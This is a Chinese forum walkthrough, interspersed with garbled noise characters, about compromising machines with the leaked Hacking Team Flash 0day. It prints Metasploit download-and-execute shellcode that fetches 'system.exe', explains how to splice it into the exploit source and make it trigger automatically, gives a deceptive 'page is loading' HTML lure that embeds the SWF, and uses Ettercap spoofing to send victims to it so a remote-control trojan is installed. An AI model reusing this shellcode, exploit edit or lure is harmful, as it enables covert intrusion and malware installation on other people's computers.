三、flash 0day之手工代码修改制作下载者实例入侵演示 8 `+ R9 n4 `$ T6 {6 V* s
: k( q" W# K5 b( s3 ]& J1 p利用到的工具:
% T" l4 D: t+ U8 R' c$ ~6 JMsf
Ettercap 9 @7 r. q. ^9 l; p& v- c2 p
. M/ k- f, [( e0 X; }Adobe Flash CS6 0 C! e( A$ h3 _3 K% o9 e
5 U5 M2 a, {6 U D+ k# l$ ?2 P9 ` Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ! R+ a7 r4 o- X: p6 X; D- [1 r
3 z. I* D/ l) T$ H' e _ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options # B! [* }) L% g$ m% e- P5 P. C
" A% S. T5 K, n8 e% C* e 如图:
( G6 b3 R# F1 Q+ F+ F( t
9 Z1 O6 k& I- ~4 A9 B2 T9 L# W
/ S# D' \! P1 Q' ~( G
, z) x) q6 F: {) {) S( B8 A7 [ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 8 r% d o! F; x3 F
. Z: \; m9 |5 l0 {, ~: L- ^! Z+ X6 A" Y3 w$ C. ?* @0 F' ~
4 \; `4 j1 {) I6 V# Z
2 Z. ?& z6 V; ?* \3 D 然后执行generate -t dword生成shellcode,如下:
9 Q8 h9 T5 p. H: F& M M% z: I" Z( T: R3 P2 T1 G/ p. ] j$ b
. c- C" S1 K! K5 v6 b
复制代码到文本下便于我们一会编辑flash exp,如下: ) `) Q# ?1 X+ s. b# n6 @: t
6 O+ Z) J; R! [) B9 g% S5 g, X8 a$ w 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ' K1 t4 \1 ^% g3 b
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, / E3 |& [( k1 D$ m6 d2 \
9 p# M( V% h X0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
r" O9 X" W9 k1 } 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 L/ [% T' k* ?1 Q0 S5 f
- V4 q' G, M! F. H, q1 w' F/ ^$ t2 N 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
/ G# G; T, v% S5 E4 I- a7 o4 K 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
7 j2 o, r9 H# o 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ! e' S" W$ p" Z& j4 k% F
8 H2 E; _6 @% s3 \: L0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, k% a1 E) z4 [# y. [" ~$ ?& t
2 J% y* Q/ u2 J( |, q 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
/ G# M) P, o0 s& u- t ^6 g0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, + R% i! `, [! I% g i
" f, f& ?( m8 j7 f2 t& q4 n# @+ g# x/ U P5 O 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
0 r( `8 C* H# l! p4 I; c- M( _ E4 z/ r8 L% `; h! Z8 G9 [. R/ J 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
/ G8 j+ U( @" N1 L# Z3 Y 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 Z" T: l" \. i. K) j
4 q) q8 q) X! V8 r- t8 S. F
i3 m( f; V3 I& l8 s; c: ~1 | & R, t9 G( J2 f% f1 Q8 C
: \' t/ A% ]: U$ Q0 R 下面我们来修改flash 0day exp,需要修改三个文件,分别为: % e$ g$ w7 t" m* t4 n3 x9 O
. S7 ? M7 u- ~( E5 [4 h0 W8 j' t1 U' C/ r% S# C; v
5 L7 ?5 S" Q6 m' s( ^3 Y: j' V 先修改ShellWin32.as,部分源代码如图:
; f$ N, d5 P" ~ Z& ^
. i1 j' f5 ^) \4 n 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ' Q( u; X# x' c# Z
1 W: c( @/ I" l3 i) f4 J, I& K! J& l: S. m
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: m$ l$ J( ?; }
: F' ]6 K( j3 ]3 ~" Z- @( z0 u2 _* ^9 ~. w0 Y
) X( j; g; O; p8 B$ i3 c" W! c: \
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
' V: _2 n2 ]* ?2 f4 g% q0 L% p9 j0 }2 `9 A4 s 4 z' z1 s3 H5 f* n3 `
P6 _, ~6 L, y, `( M
1 |. O0 M, s7 Y5 |6 h! ?( S
然后点保存,下面我们来编译一下,打开 5 n; _# ]2 y& @& g, k: a+ Q
* [+ `. V! d7 J5 U% R, V: }0 e! L+ Y! m, k$ [2 H& I: P) M exp1.fla然后点文件-发布,看看编译没错误 ( H- _+ k; G& b8 \
5 {+ s2 ?* X4 J5 }
+ Q i/ ?% H9 s& y' t0 P# a/ A
2 c4 `/ m! e' b% J- P8 b9 R ' c, {- d7 b. W
R& f% b9 d8 }: s& _6 J0 @" K
然后我们把生成的
4 W/ ?7 z" g: S. }+ f3 Uexp1.swf丢到kailinux 的/var/www/html下:
) B3 U, D! o' y& R" W然后把这段代码好好编辑一下
) z4 J8 a, }6 W* q* E
Y9 @7 | s9 ?1 u- @, c" X4 f' z4 e$ X# e + t- S- K5 M* V7 G! k% @6 N
; z$ p* R. W( z8 _5 Z) B4 y b" ] . P7 D6 A( R* }! Q. K
: O* n- P8 }( E x/ @+ L+ i% _# l; g/ @8 T$ C- L7 B 4 z! f9 G, } n# ]& _
* Q) g/ E4 `% [' d ^. F' |9 B, _7 {9 H1 g! u2 M
6 _1 r0 L- `+ R2 e0 l<!DOCTYPE html> / o+ R7 s. `* V( r9 S
9 n% g. w+ }9 Y7 D) b3 Y, N* I<html>
<head>
3 R7 K' {/ {5 r c! W% d7 b, Q- f" D- K: F! y" c <meta http-equiv="Content-Type" content="text/html;
charset=utf-8"/>
2 F5 ~) @ R4 \% B+ |( h</head>
<body>
* S0 ?! F% {2 |8 W/ a <h2> Please wait, the requested page is loading...</h2> , H8 u) h) n) k: w% ?
) t0 n. Q, b3 A! M# j: B5 ~- v0 ~) }( s9 c8 r, Q; D7 Z, _ <br> , M/ @6 q' }) i# G# E4 ?! F
. L/ S% K6 R" N) S& @; C k <OBJECT & a' g( j0 Q' S6 d% d. L& j* X
* p1 B% |2 L. G8 C+ P
classid="clsid
27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
|+ C7 O0 [! a( J </body>
/ h# @4 y# z, ]3 n* n3 t& z <script>
1 K, J s$ }* M/ F setTimeout(function () { * K ~# \3 B% n7 [ a. r
( e% P: T" p- ^; m
7 F6 n, ]5 R- ?4 e window.location.reload(); 5 y* {1 {( n* Z- W+ ~/ m$ c9 J! s
4 o* H3 n" u, Y) r) y: W}, 10000); 5 a- _- ^2 i, v9 {" ^, @
5 Y& z# m( b! V5 z 1 @" ^: j( B! }& |
5 B' k* J+ {5 J4 C+ O$ I! s$ f q</script>
7 _/ K. o2 h1 _( B; N) h: ~3 b- q' m0 j+ T6 x2 ~: J: y </html>
- U0 b, f" ?, G8 x
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
8 p1 y0 V! w7 D8 B
% `' t" s+ l, q( B) X; X8 _
; [$ m/ m+ n* d: n' T! _' ]7 ?$ [0 ]5 K! S' D4 X, y& A
- p5 k. }2 R0 @+ X9 B8 h
2 l, j" h5 i3 P* q, A3 z
$ [. S% D [6 m$ _ 下面我们用ettercap欺骗如图: # _+ h7 z1 H& n$ c5 d
# S# d* z# u* M M" Y
% P* s% K- o9 V& |
# B8 d& t4 O) j3 _ ) T4 o4 U# ^( y
1 s/ E2 Y* y/ F, t8 E' M( J: h& c5 H+ w% H, w0 N 下面我们随便访问个网站看看:
: W( U1 ]' a2 `6 G) V 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 2 Q7 k) s. x$ F7 J. F
" O0 \( @0 W, @/ Z. f
# k9 H: Q3 p1 {# U% X 我们看另一台,
& Z; T( \& a2 z+ K$ _: W! l$ z; ?; A* `, g/ D
提示这个错误,说明木马是成功被下载执行了,
只是由于某些原因没上线而已。。。
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |